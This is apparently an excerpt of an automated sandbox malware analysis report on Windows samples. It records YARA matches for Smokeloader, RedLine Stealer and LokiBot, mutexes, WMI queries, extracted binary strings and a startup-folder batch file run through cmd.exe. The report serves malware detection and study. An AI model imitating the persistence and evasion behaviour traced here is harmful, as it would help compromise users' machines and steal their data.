                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: winsta.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: amsi.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: samcli.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: samlib.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: netutils.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: userenv.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: propsys.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: oleacc.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: version.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: shfolder.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: msimg32.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: msvcr100.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: winmm.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeSection loaded: wtsapi32.dll
                  Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.4581208018.000000000A499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.4581208018.000000000A6D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000024.00000002.3385094968.0000000001171000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000001E.00000002.3216770112.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000021.00000002.3266926233.000000000111E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000020.00000002.3381975417.0000000000FDD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000001E.00000002.3187121792.0000000001021000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000020.00000002.3398211956.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000024.00000002.3409633902.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000021.00000002.3298037878.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000019.00000002.3250452098.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: BroomSetup.exe.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.9906817205315225
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@115/137@16/100
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00405C44 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,GetDiskFreeSpaceA,MulDiv,13_2_00405C44
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00414DE0 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,15_2_00414DE0
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00402988 CoCreateInstance,MultiByteToWideChar,13_2_00402988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\xBWhJ9fAo9Iu3r2QPWYsNC0n.exe
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeMutant created: \Sessions\1\BaseNamedObjects\Global\signature_netsetup
                  Source: C:\Windows\SysWOW64\rundll32.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:44256:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:19828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:25656:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\signature_netcheck
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9660:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3876
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znt5400f.utx.ps1Jump to behavior
                  Source: Yara matchFile source: 46.2.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002E.00000002.4470759393.0000000000401000.00000040.00000001.01000000.0000002B.sdmp, type: MEMORY
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                  Source: dl7WL77rkA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: dl7WL77rkA.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C048000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0DA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT OSArchitecture FROM Win32_OperatingSystem.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCDriverData=C:\Windows\System32\Drivers\DriverData
                  Source: dl7WL77rkA.exeReversingLabs: Detection: 62%
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                  Source: sUyDoVTGsfEnMY0oeyexTBut.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
